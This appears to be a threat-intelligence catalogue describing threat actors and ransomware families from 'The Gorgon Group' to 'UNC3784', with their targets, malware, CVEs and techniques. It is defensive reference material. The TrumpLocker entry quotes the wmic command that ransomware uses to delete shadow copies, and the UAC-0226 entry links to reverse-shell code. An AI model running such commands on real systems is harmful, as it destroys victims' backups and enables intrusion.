The Gorgon Group

Unit 42 researchers have been tracking Subaat, an attacker, since 2017. Recently Subaat drew our attention due to renewed targeted attack activity. Part of monitoring Subaat included realizing the actor was possibly part of a larger crew of individuals responsible for carrying out targeted attacks against worldwide governmental organizations. Technical analysis on some of the attacks as well as attribution links with Pakistan actors have been already depicted by 360 and Tuisec, in which they found interesting connections to a larger group of attackers Unit 42 researchers have been tracking, which we are calling Gorgon Group.

The Green Blood Group

The Green Blood Group is an active extortion or ransomware group tracked by RansomLook.

The Information Branch

The Information Branch

The Magic

ransomware

The National Cyber Security Commission (NCSC) – الهيئة الوطنية للأمن السيبراني

The National Cyber Security Commission (NCSC) – الهيئة الوطنية للأمن السيبراني

The Shadow Brokers

The Shadow Brokers (TSB) is a hacker group who first appeared in the summer of 2016. They published several leaks containing hacking tools from the National Security Agency (NSA), including several zero-day exploits. Specifically, these exploits and vulnerabilities targeted enterprise firewalls, antivirus software, and Microsoft products. The Shadow Brokers originally attributed the leaks to the Equation Group threat actor, who have been tied to the NSA's Tailored Access Operations unit.

TheCursedMurderer

ransomware

TheDarkEncryptor

ransomware

TheDarkOverlord

The Dark Overlord is a financially motivated ransomware group that has been active since 2016. The group is known for targeting large organizations, including Netflix, ABC, and Miramax.

TheWizards

TheWizards is a China-aligned APT group that employs the Spellbinder tool for adversary-in-the-middle attacks, utilizing IPv6 SLAAC spoofing to redirect legitimate software updates to malicious servers. They have developed the WizardNet backdoor for Windows and serve DarkNights to Android applications, indicating a connection to Dianke Network Security Technology. The group targets individuals and companies in the Philippines, Cambodia, the UAE, mainland China, and Hong Kong. ESET has observed their infrastructure and tools, including the acquisition of servers for hosting C&C and malicious updates.

Thor

ransomware

Threat Actor 888

Threat actor 888 is a hacker active in 2024, targeting companies for data breaches. They have hit Microsoft, BMW (Hong Kong), and others in the tech, freight, and oil & gas industries.

Threat Finder

Ransomware. Files cannot be decrypted. Has a GUI.

Threatmarket

Threatmarket is an active extortion or ransomware group tracked by RansomLook.

Threatsec

ThreatSec is a hacktivist group that has targeted various organizations, including internet service providers in Gaza. They claim to fight for the rights and freedom of the oppressed and do not prioritize monetary gain. The group is part of the "Five Families" consortium, which includes other hacktivist groups such as GhostSec and Stormous. ThreatSec has been involved in cyberattacks, data breaches, and ransomware activities.

THT

ransomware

ThunderCrypt

ransomware

ThunderX

ransomware

TianWu

TianWu is a threat actor tracked by MISP Galaxy. Additional information pending cataloguing.

Tick

Tick is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group appears to have close ties to the Chinese National University of Defense and Technology, which is possibly linked to the PLA. This threat actor targets organizations in the critical infrastructure, heavy industry, manufacturing, and international relations sectors for espionage purposes. The attacks appear to be centered on the political, media, and engineering sectors. The group, also tracked as STALKER PANDA, has been observed conducting targeted attacks against Japan, Taiwan, Hong Kong, and the United States.

TIDRONE

TIDRONE is an unidentified threat actor linked to Chinese-speaking groups, with a focus on military-related industry chains, particularly drone manufacturers in Taiwan. The actor employs advanced malware variants such as CXCLNT and CLNTEND, which are distributed through ERP software or remote desktops. The consistency in file compilation times and operational patterns aligns with other Chinese espionage activities, indicating a likely espionage motive.

TiltedTemple

One of their notable tools is a custom backdoor called SockDetour, which operates filelessly and socketlessly on compromised Windows servers. The group's activities have been linked to the exploitation of vulnerabilities in Zoho ManageEngine ADSelfService Plus and ServiceDesk Plus.

Timc

Timc is an active extortion or ransomware group tracked by RansomLook.

TINY SPIDER

According to CrowdStrike, this actor is using TinyLoader and TinyPOS, potentially buying access through Dridex infections.

Tk

ransomware

Tommyleaks

Tommyleaks is an active extortion or ransomware group tracked by RansomLook.

TomNom

ransomware

tooda

Members:
Eco
Ego
emo
elo
user
Dante
Sevy

Torchwood

ransomware

TorLocker

ransomware

TorrentLocker

Ransomware. Newer variants are not decryptable. Only the first 2 MB of each file are encrypted.

Tortoise

ransomware

Tortoiseshell

A previously undocumented attack group is using both custom and off-the-shelf malware to target IT providers in Saudi Arabia in what appear to be supply chain attacks with the end goal of compromising the IT providers’ customers. The group, which we are calling Tortoiseshell, has been active since at least July 2018. Symantec has identified a total of 11 organizations hit by the group, the majority of which are based in Saudi Arabia. In at least two organizations, evidence suggests that the attackers gained domain admin-level access.

TotalWipeOut

ransomware

Toufan

Toufan is an active extortion or ransomware group tracked by RansomLook.

TowerWeb

Ransomware

TOXCAR CYBER TEAM

The Toxcar Cyber Team has claimed responsibility for a data leak involving Mastercard, asserting that the attack targeted the U.S. site and providing screenshots as purported evidence. They have also been linked to the sale of an undetectable ransomware designed to bypass major antivirus software. Additionally, the group has shared the source code of Elusive Stealer, a data theft malware. Their activities highlight a focus on data breaches and malware distribution within the cyber threat landscape.

Toxcrypt

Ransomware

TOXIC PANDA

A group targeting dissident groups in China and along its borders.

Toxic

Toxic is an active extortion or ransomware group tracked by RansomLook.

TPS1.0

ransomware

TRACER KITTEN

In April 2020, CrowdStrike Falcon OverWatch discovered the Iran-based adversary TRACER KITTEN conducting malicious interactive activity against multiple hosts at a telecommunications company in the Europe, Middle East and Africa (EMEA) region. The actor was found operating under valid user accounts, using custom backdoors in combination with SSH tunnels for C2. The adversary leveraged their foothold to conduct a variety of reconnaissance activities, undertake credential harvesting and prepare for data exfiltration.

Tracfin

Tracfin

TraderTraitor

TraderTraitor targets blockchain companies through spear-phishing messages. The group sends these messages to employees, particularly those in system administration or software development roles, on various communication platforms, intended to gain access to these start-up and high-tech companies. TraderTraitor may be the work of operators previously responsible for APT38 activity.

TRAVELING SPIDER

CrowdStrike tracks the criminal developer of Nemty ransomware as TRAVELING SPIDER. The actor has been observed to take advantage of single-factor authentication to gain access to victim organizations through Citrix Gateway and to send extortion-related emails using the victim’s own Microsoft Office 365 instance.

Trick-Or-Treat

ransomware

TridentLocker

TridentLocker is a ransomware group known for targeting organizations that manage high volumes of regulated or third-party data, including government services and telecom providers. They have claimed breaches of multiple victims, such as TMPartner, Sedgwick, and Advantage 360, often exfiltrating sensitive data before deploying ransomware. The group employs techniques such as stolen credentials, phishing, and exploitation of unpatched software to gain initial access and move laterally within networks. Their operations are characterized by high visibility postings on their leak portal, which include detailed victim profiles and countdown timers to create public pressure.

Trigona

Trigona is an active extortion or ransomware group tracked by RansomLook.

TRIPLESTRENGTH

TRIPLESTRENGTH is a financially motivated threat actor targeting cloud environments and on-premises infrastructures for cryptojacking, ransomware, and extortion. They exploit stolen credentials, cookies, and information stealer logs to gain unauthorized access to platforms like Google Cloud, AWS, and Microsoft Azure, deploying the unMiner application for cryptocurrency mining. Their ransomware operations utilize lockers such as Phobos, LokiLocker, and RCRU64, involving lateral movement and mass encryption. TRIPLESTRENGTH also engages in account hijacking and collaborates with partners for ransomware and blackmail operations, advertising their services in hacking-focused Telegram channels.

Tripoli

ransomware

Trisec

Trisec is an active extortion or ransomware group tracked by RansomLook.

Trojan Dz

CyberSplitter variant

Trojan-Syria

ransomware

Trojan

Ransomware

Troldesh or Shade, XTBL

Ransomware. May download additional malware after encryption.

TrueCrypter

Ransomware

TrumpHead

ransomware

TrumpLocker Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc. This is the old VenusLocker in disguise. It deletes shadow copies using the following command: C:\Windows\system32\wbem\wmic.exe shadowcopy delete&exit

Try2Cry

ransomware

tssxx25

tssxx25 is an active extortion or ransomware group tracked by RansomLook.

Tstark

TStark is a threat actor identified by X-Ops, associated with a cluster of devices that executed the bookmark buffer overflow exploit targeting CVE-2020-15069 (T1203). The actor exhibited odd telemetry behavior indicative of intermittent VPN usage, switching between IP addresses geolocated to Hong Kong and Chengdu. Analysis revealed malware samples for Mac OS X and iOS, as well as IFRAME injection code exploiting a WebAssembly vulnerability (T1189). Additionally, TStark was linked to the development of libsophos.so and the deployment of malicious payloads across their devices.

Tuborg

Tuborg is an active extortion or ransomware group tracked by RansomLook.

Tumbleweed Typhoon

Microsoft threat actor profile. Origin/Threat: China.

TunnelSnake

The TunnelSnake campaign demonstrates the activity of a sophisticated actor that invests significant resources in designing an evasive toolset and infiltrating networks of high-profile organizations. By leveraging Windows drivers, covert communications channels and proprietary malware, the group behind it maintains a considerable level of stealth. That said, some of its TTPs, like the usage of a commodity webshell and open-source legacy code for loading unsigned drivers, may get detected and in fact were flagged by Kaspersky's product, giving them visibility into the group’s operation.

TurkHackTeam

Founded in 2004, Turkhackteam is one of Turkey’s oldest and most high-profile hacking collectives. According to a list compiled on Turkhackteam’s forum, the group has carried out almost 30 highly publicized hacking campaigns targeting foreign government and commercial websites, including websites of international corporations.

Turkish Crypter

Turkish Crypter is an active extortion or ransomware group tracked by RansomLook.

Turkish FileEncryptor Ransomware

This is most likely to affect English-speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised, including music, MS Office, Open Office, pictures, videos, shared online files etc.

Turkish Ransom

Ransomware

Turkish

Ransomware

TurkStatik

ransomware

TwoSail Junk

TwoSail Junk directs visitors to its exploit site by posting links within the threads of forum discussions, or creating new topic threads of their own. To date, dozens of visits were recorded from within Hong Kong, with a couple from Macau. The technical details around the functionality of the iOS implant, called LightSpy, and related infrastructure, reveal a low-to-mid capable actor. However, the iOS implant is a modular and exhaustively functional iOS surveillance framework.

Tycoon

This malware is written in Java and is named after references in the code. Tycoon has been in the wild since December 2019 and has targeted organizations in the education and software industries as well as SMBs. Tycoon is a multi-platform Java ransomware that targets Windows and Linux systems. This ransomware denies access to the system administrator following an attack on the domain controller and file servers. The initial intrusion occurs through an internet-facing remote desktop protocol (RDP) jump-server.

TYRANT

DUMB variant discovered on November 16, 2017. It disguised itself as a popular virtual private network (VPN) in Iran known as Psiphon and infected Iranian users. It included a Farsi-language ransom note and is decryptable in the same way as previous DUMB-based variants. The message requested only US$15 for the unlock key and advertised two local, Iran-based payment processors: exchange.ir and webmoney.ir. It shared unique and specialized indicators with RASTAKHIZ; iDefense threat intelligence analysts believe this similarity confirms that the same actor was behind the repurposing of both types of ransomware.

U Bomb

U Bomb is an active extortion or ransomware group tracked by RansomLook.

UAC-0006

UAC-0006 is a financially motivated threat actor that has been active since at least 2013. They primarily target Ukrainian organizations, particularly accountants, with phishing emails containing the SmokeLoader malware. Their goal is to steal credentials and execute unauthorized fund transfers, posing a significant risk to financial systems.

UAC-0020

Vermin is a threat actor group linked to the Luhansk People’s Republic and believed to be acting on behalf of the Kremlin. They have targeted Ukrainian government infrastructure using malware like Spectr and legitimate tools like SyncThing for data exfiltration. Vermin has been active since at least 2018, using custom-made RATs like Vermin and open-source tools like Quasar for cyber-espionage. The group has resurfaced after periods of inactivity to conduct espionage operations against Ukraine's military and defense sectors.

UAC-0050

UAC-0050 is a threat actor that has been active since 2020, targeting government agencies in Ukraine. They have been distributing the Remcos RAT malware through phishing campaigns, using tactics such as impersonating the Security Service of Ukraine and sending emails with malicious attachments. The group has also been linked to other hacking collectives, such as UAC-0096, and has previously used remote administration tools like Remote Utilities. The motive behind their attacks is likely espionage.

UAC-0063

UAC-0063 is a threat actor linked to Russian APT28, known for targeting government entities in Ukraine and Central Asia for cyber espionage operations. They utilize keyloggers, backdoors, and malware like Hatvibe and Cherryspy to compromise systems and exfiltrate sensitive information. The group has been active since at least 2021 and has shown interest in targeting organizations in Mongolia, Kazakhstan, Kyrgyzstan, Israel, and India. Their TTPs include spear-phishing campaigns and exploiting vulnerabilities in software products like HFS HTTP File Server and Rejetto file-sharing servers.

UAC-0094

The State Service of Special Communication and Information Protection of Ukraine spotted a new wave of cyber attacks aimed at gaining access to users’ Telegram accounts. The Ukrainian CERT attributes the hacking campaign to threat actors tracked as UAC-0094. The threat actors target Telegram users by sending Telegram messages with malicious links to the Telegram website in order to gain unauthorized access to accounts by capturing the one-time code sent via SMS.

UAC-0098

UAC-0098 is believed to be an initial access broker who originally delivered malware like IcedID and Cobalt Strike for financial gain, but who has appeared to shift its operations to more politically aligned activity, such as compromising government, humanitarian, and non-profit organizations related to Ukraine and other European entities.[[Google TAG Ukraine IABs September 7 2022](/references/848da19d-b02d-4b78-b3c1-a72d5034fd45)]

UAC-0099

UAC-0099 is a threat actor that has been active since at least May 2023, targeting Ukrainian entities. They have been observed using a known WinRAR vulnerability to carry out attacks, indicating a level of sophistication. The actor relies on PowerShell and the creation of scheduled tasks to execute malicious VBS files for initial infection. Monitoring and limiting the functionality of these components can help mitigate the risk of UAC-0099 attacks.

UAC-0102

UAC-0102 is a threat actor group targeting UKR.NET users through phishing attacks. They distribute emails with HTML file attachments that redirect users to a fraudulent website to steal authentication data. Security teams can use Sigma rules to detect their phishing campaigns and leverage IOCs provided by CERT-UA to hunt for their activity in SIEM or EDR environments.

UAC-0118

From Russia with Love (FRwL) is a threat actor group that emerged during the Russia-Ukraine war in 2022. They primarily engage in DDoS attacks and have targeted critical infrastructure, media, energy, and government entities. FRwL has been linked to the use of the Somnia ransomware, which they employ as a wiper rather than for financial gain. While there is no direct evidence linking FRwL to the Russian Main Intelligence Directorate, it is possible that they coordinate activities with state-aligned hacktivist groups.

UAC-0149

UAC-0149 is a threat actor targeting the Armed Forces of Ukraine with COOKBOX malware. They use obfuscation techniques like character encoding and base64 encoding to evade detection. The group leverages dynamic DNS services and Cloudflare Workers for their C2 infrastructure.

UAC-0154

UAC-0154 is a threat actor orchestrating the STARK#VORTEX phishing campaign, specifically targeting Ukraine’s military. They employ a Microsoft Help file containing obfuscated JavaScript as a lure, disguised as a manual for Pilot-in-Command Drones, to deliver the MerlinAgent malware. This PowerShell-based RAT is heavily obfuscated and downloads a payload from a remote server, enabling full control over compromised systems. The group initially targeted Ukrainian entities using military-themed documents sent via email to @ukr.net addresses.

UAC-0184

UAC-0184 is a threat actor targeting Ukrainian organizations in Finland, using the Remcos Remote Access Trojan in their attacks. They have been observed utilizing steganographic image files and the IDAT Loader to deliver the malware. The group has targeted the Armed Forces of Ukraine and impersonated military recruitment processes to infect systems with the Remcos RAT.

UAC-0185

UAC-0185 has been active since at least 2022, primarily targeting Ukrainian defense organizations through credential theft via messaging apps like Signal, Telegram, and WhatsApp, as well as military systems such as DELTA, TENETA, and Kropyva. The group employs phishing attacks, often impersonating the Ukrainian Union of Industrialists and Entrepreneurs (UUIE), to gain unauthorized access to the PCs of defense sector employees. They utilize custom tools, including MESHAGENT and UltraVNC, to facilitate their operations. Their activities are mapped to MITRE ATT&CK, focusing on tactics related to credential theft and remote access.

UAC-0194

UAC-0194 is a Russian threat actor linked to the exploitation of the Windows zero-day CVE-2024-43451, which was used in attacks against Ukrainian organizations. The group delivered phishing emails containing .url files that, when interacted with, exploited the vulnerability to facilitate the installation of additional payloads, including the SparkRAT trojan. They also exploited the Server Message Block protocol for NTLM hash exfiltration. CERT-UA has associated UAC-0194's activities with social engineering tactics to convince victims to execute malicious files.

UAC-0215

UAC-0215 is an APT group that has orchestrated a phishing campaign targeting public institutions, major industries, and military units in Ukraine, utilizing rogue RDP files to gain unauthorized access. The malicious emails are designed to appear legitimate, enticing recipients to open attachments that connect their systems to the attacker's server, allowing extensive access to local resources. CERT-UA has identified this activity as high-risk and has advised organizations to block RDP files at mail gateways and restrict RDP connection capabilities. The campaign's geographical footprint suggests a potential for broader cyberattacks beyond Ukraine.

UAC-0219

UAC-0219 is a hacking group observed conducting cyber-espionage operations targeting Ukrainian critical sectors, primarily utilising WRECKSTEEL malware for file exfiltration in both VBScript and PowerShell variants. Their activities focus on gathering intelligence from military innovation hubs, armed forces, law enforcement, and regional government institutions. CERT-UA has linked multiple cyber-attacks against government agencies and critical infrastructure in Ukraine to UAC-0219, emphasizing their reliance on specialized malware for sensitive information theft. The group’s operations are characterized by stealthy access and data exfiltration tactics, consistent with state-sponsored APT behavior.

UAC-0226

UAC-0226 is a cyber-espionage group targeting Ukrainian military, law enforcement, and local government entities—particularly near the eastern border—since February 2025. Initial access is achieved via phishing emails containing malicious .xlsm documents that decode and execute base64-encoded payloads stored in spreadsheet cells. Two main tools are used: a .NET-based reverse shell leveraging PowerShell code from a public GitHub repository (https://github.com/tihanyin/PSSW100AVB), and GIFTEDCROOK, a C/C++ stealer that extracts browser data (cookies, history, credentials), archives it with PowerShell, and exfiltrates via Telegram. The group often abuses compromised webmail accounts for delivery, underlining the importance of detailed email and web server logging. Their activity shows a mix of low development overhead and high operational targeting, consistent with state-aligned espionage.

UAC-0227

UAC-0227 is an APT group that has been active since at least March 2025, targeting local governments, critical infrastructure, and various organizations in the European Union. The group employs phishing campaigns that utilize SVG file attachments to distribute stealers like Amatera Stealer and Strela Stealer. Their tactics include leveraging ClickFix-style methods to implement their threats.

UAC-0239

UAC-0239 has been observed conducting spearphishing attacks targeting the Defence Forces and local state agencies of Ukraine, impersonating the Security Service of Ukraine. The group employs the OrcaC2 framework and FILEMESS stealer to compromise these organizations. Their campaigns often utilize themes related to "countering russian sabotage-reconnaissance groups" to disguise their malicious intent.

UAC-0241

UAC-0241 is a threat actor tracked by CERT-UA, active from May to November 2025, targeting educational institutions and government bodies in eastern Ukraine via spear-phishing emails from compromised Gmail accounts. These emails deliver password-protected ZIP archives with malicious LNK files that trigger an HTA → JavaScript → PowerShell chain, deploying the credential harvester LaZagne, file-stealer scripts, and the Go-based GAMYBEAR backdoor for command execution, data exfiltration over HTTP, and persistence via registry Run keys. Initial access stemmed from a May 26 phishing email spoofing a local emergency agency, with compromised systems exploited for lateral movement.

UAC-0245

Threat actors, tracked under the identifier UAC-0245 and targeting Ukraine, employ malicious XLL files disguised as critical documents.

UAT-10362

UAT-10362 is a threat actor identified by Cisco Talos, conducting spear-phishing campaigns targeting Taiwanese NGOs and suspected universities to deploy the malware "LucidRook." The malware features a multi-language modular design, layered anti-analysis capabilities, and stealth-focused payload handling. UAT-10362's operations rely on compromised or public infrastructure, indicating a mature level of operational tradecraft.

UAT-10608

UAT-10608 is a threat cluster observed by Cisco Talos conducting a large-scale, automated credential-harvesting campaign against public-facing web applications, especially Next.js deployments, using a custom framework called NEXUS Listener to extract and exfiltrate secrets such as credentials, SSH keys, cloud tokens, and API keys. The activity has been linked to broad opportunistic scanning and at least 766 compromised hosts across multiple regions and cloud providers.

UAT-5394

UAT-5394 is a state-sponsored North Korean threat actor known for developing the MoonPeak RAT, which is based on XenoRAT. They have transitioned from using QuasarRAT to MoonPeak and have established command and control infrastructure. UAT-5394 employs tactics such as using RDP for remote access and has implemented State Machines in their malware to complicate analysis. Their activity indicates a focus on rapidly evolving their malware and infrastructure to enhance operational capabilities.

UAT-5918

UAT-5918 is an APT group that targets entities in Taiwan, primarily in telecommunications, healthcare, and IT sectors, to establish long-term access for information theft. They exploit N-day vulnerabilities in unpatched web and application servers to gain initial access and utilize web shells, credential harvesting tools like Mimikatz and LaZagne, and red-teaming tools for post-compromise activities. UAT-5918 conducts network reconnaissance to pivot across endpoints, harvesting credentials and sensitive data, including database backups. Their operations show significant overlap with other APT groups in terms of TTPs and targeted industries.

UAT-6382

UAT-6382 is a Chinese-speaking threat actor that exploits CVE-2025-0944 to gain access to enterprise networks, particularly targeting local governing bodies in the U.S. They deploy web shells like AntSword and chinatso/Chopper on IIS web servers and utilize Rust-based loaders to deploy Cobalt Strike and VShell for persistent access. UAT-6382 employs custom tooling, such as TetraLoader, and conducts reconnaissance to identify and exfiltrate files of interest. Their VShell stager connects to a hardcoded C2 server and executes payloads in memory, indicating modifications made by the actor.

UAT-7237

UAT-7237 is a Chinese-speaking APT group that has been active since at least 2022, primarily targeting web infrastructure entities in Taiwan. They utilize a customized shellcode loader known as “SoundBill” to execute shellcode, including Cobalt Strike payloads, and rely on SoftEther VPN clients and RDP for persistence and access. UAT-7237 employs techniques such as credential extraction using Mimikatz, reconnaissance with WMI-based tools, and selective deployment of web shells. Their operations indicate a focus on long-term persistence and stealth, with a preference for open-source and customized tooling.

UAT-8099

UAT-8099 is a Chinese-speaking cybercrime group primarily engaged in SEO fraud and the theft of high-value credentials, configuration files, and certificate data from vulnerable IIS servers. They utilize web shells and PowerShell to deploy the GotoHTTP tool for remote access, while also employing techniques such as DLL sideloading and RDP for persistence. The group has been observed using BadIIS variants for SEO manipulation and executing reconnaissance commands to gather system information. Additionally, they create hidden accounts and utilize VPN tools to maintain long-term access to compromised systems.

UAT-8302

UAT-8302 is a sophisticated China-nexus APT group targeting government entities in South America and southeastern Europe, deploying custom-made malware such as NetDraft, CloudSorcerer version 3, and VSHELL. They utilize tools like SNOWLIGHT and SNOWRUST for initial access and reconnaissance, employing techniques such as PowerShell scripts and SMB share discovery. UAT-8302 also establishes backdoor access through proxy servers and uses tools like Stowaway for tunneling traffic. Their operations indicate a close relationship with other known China-nexus threat actors, leveraging shared malware families and TTPs.

UAT-8616

UAT-8616 is a highly sophisticated cyber threat actor attributed by Cisco Talos, with evidence of activity dating back to at least 2023. They have been observed exploiting CVE-2026-20127 in the wild and previously exploited CVE-2022-20775 by escalating to root user access through a software version downgrade. Their operations indicate a focus on targeting network edge devices to establish persistent footholds in high-value organizations, including Critical Infrastructure sectors.

UAT-8837

UAT-8837 is a sophisticated China-linked APT group exploiting critical zero-day vulnerabilities, such as CVE-2025-53690 in the Sitecore platform, to achieve remote code execution and deploy the WeepSteel backdoor for espionage and data exfiltration. The group targets high-value enterprise and government sectors, focusing on public-facing applications to gain initial access and conducting stealthy reconnaissance. UAT-8837 employs techniques like privilege escalation by creating administrative accounts and is linked to targeted intrusions aimed at credential harvesting and internal reconnaissance.

UAT-9244

UAT-9244 is a China-nexus APT actor, disclosed by Cisco Talos on March 5, 2026, assessed with high confidence as closely associated with Famous Sparrow and overlapping with Tropic Trooper. Active since 2024, it exclusively targets South American telecommunication providers, deploying three novel cross-platform malware families: TernDoor (Windows backdoor with DLL side-loading and evasion driver), PeerTime (Linux/embedded backdoor using BitTorrent for resilient C2), and BruteEntry (GoLang scanner turning edge devices into Operational Relay Boxes for SSH/Postgres/Tomcat brute-force). The campaign enables persistent access, remote command execution, lateral movement, and infrastructure relay via unified C2 with shared SSL certificates and domains like bloopencil.net.

UAT-9686

UAT-9686 is a Chinese state-sponsored APT known for targeting networking infrastructure and edge appliances through a sophisticated espionage campaign. They exploit a critical flaw in the Cisco AsyncOS Spam Quarantine interface to gain root access and deploy custom malware, including AquaShell, along with Python scripts that execute natively. Their operations involve reverse tunneling and log purging, demonstrating a methodical approach to compromising communication infrastructure. Talos has observed overlaps in TTPs and tooling with other Chinese-nexus threat actors, indicating a consistent operational pattern.

UAT-9921

UAT-9921 is a China-nexus threat actor active since 2019, tracked by Cisco Talos. In 2026, they were observed deploying 'VoidLink', a sophisticated modular framework primarily targeting Linux systems (IoT, Critical Infrastructure). Unique characteristics include the use of AI-enabled IDEs for rapid development (ZigLang implant, GoLang backend), P2P mesh networking for C2, and advanced persistence via eBPF rootkits. They target Technology and Financial sectors exploiting Java serialization vulnerabilities (Apache Dubbo).

UCCU

Ransomware

$ucyLocker

Ransomware

Uh-Oh

Ransomware

Uiwix Ransomware

Using EternalBlue SMB Exploit To Infect Victims

Ukash

Ransomware

Ukrainian Cyber Alliance

The Ukrainian Cyber Alliance is a hacktivist group that has demonstrated capabilities in exploiting vulnerabilities, such as CVE-2023-22515 in Confluence, to escalate privileges and access targeted infrastructure. They successfully accessed Trigona's systems, exfiltrating sensitive data and ultimately defacing and deleting the group's site.

Ultimo HT

Ransomware

UltraCrypter

Ransomware

UltraLocker Ransomware

It is aimed at English-speaking users and can therefore infect victims worldwide. It is spread via email spam, fake updates, malicious attachments and similar lures. It encrypts all of the victim's files, including music, MS Office and OpenOffice documents, pictures, videos, shared online files, etc. It is based on the open-source ransomware CryptoWire.

UmbreCrypt

Ransomware, CrypBoss family

UnblockUPC

Ransomware

UNC1069

CryptoCore is a North Korean APT known for targeting cryptocurrency exchanges and financial institutions, employing spear-phishing techniques that lead to LONEJOGGER malware infections. The group has leveraged social engineering tactics, including deepfake technology and hijacked YouTube accounts, to execute sophisticated giveaway scams that deceive victims into sending cryptocurrencies. Their operations have involved the misuse of platforms like Gemini for reconnaissance and the development of fraudulent content. Additionally, CryptoCore has been linked to a variety of campaigns, including Dangerous Password and SnatchCrypto, focusing on financial gain through cryptocurrency theft.

UNC1549

UNC1549 is an Iranian threat actor linked to Tortoiseshell and potentially the IRGC. They have been active since at least June 2022, targeting entities worldwide with a focus on the Middle East. UNC1549 uses spear-phishing and credential harvesting for initial access, deploying custom malware like MINIBIKE and MINIBUS backdoors. They have also been observed using evasion techniques and a tunneler named LIGHTRAIL in their operations.

UNC1860

UNC1860 is a persistent and opportunistic Iranian state-sponsored threat actor that is likely affiliated with Iran’s Ministry of Intelligence and Security (MOIS). A key feature of UNC1860 is its collection of specialized tooling and passive backdoors that Mandiant believes supports several objectives, including its role as a probable initial access provider and its ability to gain persistent access to high-priority networks, such as those in the government and telecommunications space throughout the Middle East.

UNC1878

UNC1878 is a financially motivated threat actor that monetizes network access via the deployment of RYUK ransomware. Earlier this year, Mandiant published a blog on a fast-moving adversary deploying RYUK ransomware, UNC1878. Shortly after its release, there was a significant decrease in observed UNC1878 intrusions and RYUK activity overall almost completely vanishing over the summer. But beginning in early fall, Mandiant has seen a resurgence of RYUK along with TTP overlaps indicating that UNC1878 has returned from the grave and resumed their operations.

UNC215

UNC215 is a Chinese nation-state threat actor that has been active since at least 2014. They have targeted organizations in various sectors, including government, technology, telecommunications, defense, finance, entertainment, and healthcare. UNC215 has been observed using tools such as Mimikatz, FOCUSFJORD, and HYPERBRO for initial access and post-compromise activities. They have demonstrated a focus on evading detection and have employed tactics such as using trusted third parties, minimizing forensic evidence, and incorporating false flags. UNC215's targets are located globally, with a particular focus on the Middle East, Europe, Asia, and North America.

UNC2447

UNC2447 is a financially motivated threat actor with ties to multiple hacker groups. They have been observed deploying ransomware, including FiveHands and Hello Kitty, and engaging in double extortion tactics. They have been active since at least May 2020 and target organizations in Europe and North America.

UNC2452

Reporting regarding activity related to the SolarWinds supply chain injection has grown quickly since initial disclosure on 13 December 2020. A significant amount of press reporting has focused on the identification of the actor(s) involved, victim organizations, possible campaign timeline, and potential impact. The US Government and cyber community have also provided detailed information on how the campaign was likely conducted and some of the malware used. MITRE’s ATT&CK team — with the assistance of contributors — has been mapping techniques used by the actor group, referred to as UNC2452/Dark Halo by FireEye and Volexity respectively, as well as SUNBURST and TEARDROP malware.

UNC2465

UNC2465 is a threat actor known for deploying the SMOKEDHAM .NET backdoor and DARKSIDE ransomware, utilizing TTPs such as phishing, Trojanized software installers, and supply chain attacks. They have employed the NGROK utility to expose internal services and facilitate lateral movement within victim environments. UNC2465 has also leveraged tools like UltraVNC, Cobalt Strike BEACON, and conducted credential harvesting via LSASS memory dumping. Their operations have included extortion tactics through a leaks website over TOR, applying pressure on victims by releasing stolen data.

UNC2565

UNC2565 is a threat group that has used the GOOTLOADER downloader to deliver Cobalt Strike BEACON. These intrusions have stemmed from victims accessing malicious websites that use SEO techniques to improve Google search rankings. After obtaining a foothold in the environment, UNC2565 has conducted reconnaissance and credential harvesting activity using common tools such as BLOODHOUND and KERBEROAST. UNC2565's motivations are currently unknown but overlaps with activity that has led to SODINOKIBI ransomware. This suggests that the threat group may be financially motivated.

UNC2630

UNC2630 is a threat actor believed to be affiliated with the Chinese government. They engage in cyber espionage activities, targeting organizations aligned with Beijing's strategic objectives. UNC2630 demonstrates advanced tradecraft and employs various malware families, including SLOWPULSE and RADIALPULSE, to compromise Pulse Secure VPN appliances. They also utilize modified binaries and scripts to maintain persistence and move laterally within compromised networks.

UNC2659

UNC2659 has been active since at least January 2021. We have observed the threat actor move through the whole attack lifecycle in under 10 days. UNC2659 is notable given their use of an exploit in the SonicWall SMA100 SSL VPN product, which has since been patched by SonicWall. The threat actor appeared to download several tools used for various phases of the attack lifecycle directly from those tools’ legitimate public websites.

UNC2717

UNC2717 is a threat actor that engages in espionage activities aligned with Chinese government priorities. They demonstrate advanced tradecraft and take measures to avoid detection, making it challenging for network defenders to identify their tools and intrusion methods. UNC2717, along with other Chinese APT actors, has been observed stealing credentials, email communications, and intellectual property. They have targeted global government agencies using malware such as HARDPULSE, QUIETPULSE, and PULSEJUMP.

UNC2814

UNC2814 is a suspected PRC-nexus cyber espionage group that has targeted telecommunications providers and government entities globally since at least 2017. The group employs the GRIDTIDE backdoor to blend malicious traffic with legitimate cloud API activity and utilizes living-off-the-land techniques, including SSH lateral movement and the creation of malicious systemd services. GTIG has confirmed 53 intrusions across 42 countries and identified suspected activity in at least 20 additional nations, with a focus on exfiltrating sensitive communications data. Google has taken significant disruption actions against UNC2814, including infrastructure takedowns and the release of IOCs to aid in detection.

UNC2970

UNC2970 is a North Korean threat actor that primarily targets organizations through spear-phishing emails with job recruitment themes, often utilizing fake LinkedIn accounts to engage victims. The group employs the PLANKWALK backdoor and other malware families, leveraging compromised WordPress sites for command and control. They have been observed using BYOVD techniques to exploit vulnerable drivers for evading detection. Mandiant has noted a shift in UNC2970's targeting strategy, including a focus on security researchers and advancements in their operational capabilities against EDR tools.

UNC3524

Mandiant observed this group operating since December 2019. Its techniques partially overlap with multiple Russian-based espionage actors (APT28 and APT29). They are described as having a high level of operational security, low malware footprint, adept evasive skills, and a large Internet of Things (IoT) device botnet at their disposal.

UNC3569

China-nexus espionage actor that has been observed exploiting vulnerabilities in Aspera Faspex, Microsoft Exchange, and Oracle Web Applications Desktop Integrator, among others, to gain initial access to target environments.

UNC3784

